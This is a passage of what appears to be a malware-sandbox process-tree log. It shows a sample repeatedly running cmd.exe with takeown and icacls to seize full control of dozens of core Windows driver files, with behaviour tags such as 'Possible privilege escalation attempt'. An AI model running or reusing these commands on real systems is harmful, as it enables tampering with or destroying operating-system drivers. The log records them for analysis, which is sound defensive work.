C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit2⤵PID:5540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mssmbios.sys3⤵
- Modifies file permissions
PID:5804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit2⤵PID:5580
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mstee.sys3⤵PID:5976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit2⤵PID:5628
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MTConfig.sys3⤵PID:5832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit2⤵PID:5700
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mup.sys3⤵PID:5940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit2⤵PID:5728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndis.sys3⤵PID:5992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit2⤵PID:5752
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiscap.sys3⤵PID:6004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit2⤵PID:5780
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndistapi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6052
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:6120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit2⤵PID:5824
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndisuio.sys3⤵PID:6088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit2⤵PID:5876
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiswan.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit2⤵PID:5916
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndproxy.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6080
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit2⤵PID:5956
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbios.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6064
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit2⤵PID:6016
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbt.sys3⤵PID:5192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit2⤵PID:6044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netio.sys3⤵PID:5268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit2⤵PID:6108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nfrd960.sys3⤵PID:5352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit2⤵PID:5076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\npfs.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:5476
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"3⤵PID:5524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit2⤵PID:4168
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nsiproxy.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5424
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit2⤵PID:5064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ntfs.sys3⤵PID:5508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit2⤵PID:4308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\null.sys3⤵PID:5616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit2⤵PID:5276
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvraid.sys3⤵PID:5316
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"3⤵PID:5444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit2⤵PID:5356
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvstor.sys3⤵PID:5740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit2⤵PID:5480
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NV_AGP.SYS3⤵
- Possible privilege escalation attempt
PID:5464
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "Admin:F"3⤵PID:5284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit2⤵PID:5644
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nwifi.sys3⤵PID:6120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit2⤵PID:5364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ohci1394.sys3⤵
- Modifies file permissions
PID:5980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit2⤵PID:5556
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pacer.sys3⤵PID:6088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit2⤵PID:5808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\parport.sys3⤵PID:6104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit2⤵PID:5928
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\partmgr.sys3⤵PID:6036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit2⤵PID:6008
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pci.sys3⤵PID:5888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit2⤵PID:6052
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciide.sys3⤵
- Modifies file permissions
PID:4112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit2⤵PID:6092
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciidex.sys3⤵PID:5144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit2⤵PID:5256
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcmcia.sys3⤵PID:5588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit2⤵PID:5960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcw.sys3⤵PID:1320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit2⤵PID:5948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\PEAuth.sys3⤵PID:5612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit2⤵PID:5956
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\portcls.sys3⤵PID:5388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit2⤵PID:5268
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\processr.sys3⤵PID:5604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\processr.sys /grant "Admin:F"3⤵PID:4400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit2⤵PID:5560
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql2300.sys3⤵PID:5376
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ql2300.sys /grant "Admin:F"3⤵PID:5740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit2⤵PID:5076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql40xx.sys3⤵
- Modifies file permissions
PID:5524
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ql40xx.sys /grant "Admin:F"3⤵PID:5604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit2⤵PID:4776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\qwavedrv.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5588
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\qwavedrv.sys /grant "Admin:F"3⤵PID:5620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit2⤵PID:5312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasacd.sys3⤵PID:6036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit2⤵PID:5308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasl2tp.sys3⤵PID:5484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit2⤵PID:5836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspppoe.sys3⤵PID:5980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit2⤵PID:5844
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspptp.sys3⤵PID:4660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit2⤵PID:5164
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rassstp.sys3⤵PID:5424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit2⤵PID:6012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdbss.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdbss.sys /grant "Admin:F"3⤵PID:5484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit2⤵PID:5612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpbus.sys3⤵
- Modifies file permissions
PID:5616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit2⤵PID:5740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPCDD.sys3⤵PID:5980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit2⤵PID:5324
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpdr.sys3⤵
- Possible privilege escalation attempt
PID:5520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit2⤵PID:5180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPENCDD.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6200
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "Admin:F"3⤵PID:6248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit2⤵PID:5240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPREFMP.sys3⤵PID:6056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit2⤵PID:4968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpvideominiport.sys3⤵PID:5520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit2⤵PID:5572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpwd.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6188
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rdpwd.sys /grant "Admin:F"3⤵PID:6240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit2⤵PID:4532
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdyboost.sys3⤵PID:6172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit2⤵PID:5160
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rmcast.sys3⤵
- Modifies file permissions
PID:6272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit2⤵PID:5656
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RNDISMP.sys3⤵
- Modifies file permissions
PID:6320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit2⤵PID:6156
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rootmdm.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6348
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\rootmdm.sys /grant "Admin:F"3⤵PID:6368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit2⤵PID:6220
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rspndr.sys3⤵
- Possible privilege escalation attempt
PID:6404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit2⤵PID:6288
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Rtnic64.sys3⤵PID:6440
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Rtnic64.sys /grant "Admin:F"3⤵PID:6456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit2⤵PID:6328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sbp2port.sys3⤵PID:6504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit2⤵PID:6380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scfilter.sys3⤵PID:6532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit2⤵PID:6424
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scsiport.sys3⤵PID:6572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit2⤵PID:6476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\secdrv.sys3⤵
- Possible privilege escalation attempt
PID:6616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit2⤵PID:6516
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serenum.sys3⤵PID:6656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit2⤵PID:6556
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serial.sys3⤵PID:6720
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\serial.sys /grant "Admin:F"3⤵PID:6776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit2⤵PID:6596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sermouse.sys3⤵PID:6700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit2⤵PID:6636
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffdisk.sys3⤵PID:6812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit2⤵PID:6672
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_mmc.sys3⤵
- Modifies file permissions
PID:6896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit2⤵PID:6708
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_sd.sys3⤵PID:6920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit2⤵PID:6748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sfloppy.sys3⤵PID:6932
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sfloppy.sys /grant "Admin:F"3⤵PID:7036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit2⤵PID:6792
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid2.sys3⤵
- Modifies file permissions
PID:6948
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\sisraid2.sys /grant "Admin:F"3⤵PID:7028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit2⤵PID:6836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid4.sys3⤵PID:6940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit2⤵PID:6860
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smb.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6996
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\smb.sys /grant "Admin:F"3⤵PID:7108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit2⤵PID:6888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smclib.sys3⤵PID:5076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit2⤵PID:6956
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spldr.sys3⤵
- Possible privilege escalation attempt
PID:5572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit2⤵PID:6984
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spsys.sys3⤵
- Modifies file permissions
PID:6240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sr9lbsiiph8afw.sys && icacls C:\Windows\System32\drivers\sr9lbsiiph8afw.sys /grant "%username%:F" && exit2⤵PID:7020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sr9lbsiiph8afw.sys3⤵
- Possible privilege escalation attempt
PID:6352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit2⤵PID:7072
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:6372
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srv.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit2⤵PID:7100
-
